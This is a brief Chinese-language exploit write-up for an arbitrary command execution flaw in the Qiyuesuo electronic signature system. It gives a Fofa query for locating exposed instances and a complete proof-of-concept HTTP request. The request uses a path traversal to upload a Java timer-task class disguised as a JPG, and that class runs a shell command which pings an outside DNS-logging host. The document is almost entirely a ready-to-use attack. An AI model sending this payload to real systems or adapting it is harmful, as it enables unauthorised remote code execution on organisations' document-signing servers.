契约锁电子签章系统任意命令执行漏洞

wsw

Fofa语法
title="契约锁"&&title="电子签章"
漏洞POC
POST /callback/%2E%2E;/code/upload HTTP/1.1
Host: 1.1.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryco2lQ5vxCOn9Aq2R


------WebKitFormBoundaryco2lQ5vxCOn9Aq2R
Content-Disposition: form-data; name="type";

TIMETASK
------WebKitFormBoundaryco2lQ5vxCOn9Aq2R
Content-Disposition: form-data; name="file";filename="qys.jpg"

package qiyuesuo;

import com.qiyuesuo.utask.java.BaseTimerTask;

public class qiyuesuo004 extends BaseTimerTask {
    static {try{Runtime.getRuntime().exec("ping dns.log.cn");}catch (Exception e){}}
}
------WebKitFormBoundaryco2lQ5vxCOn9Aq2R--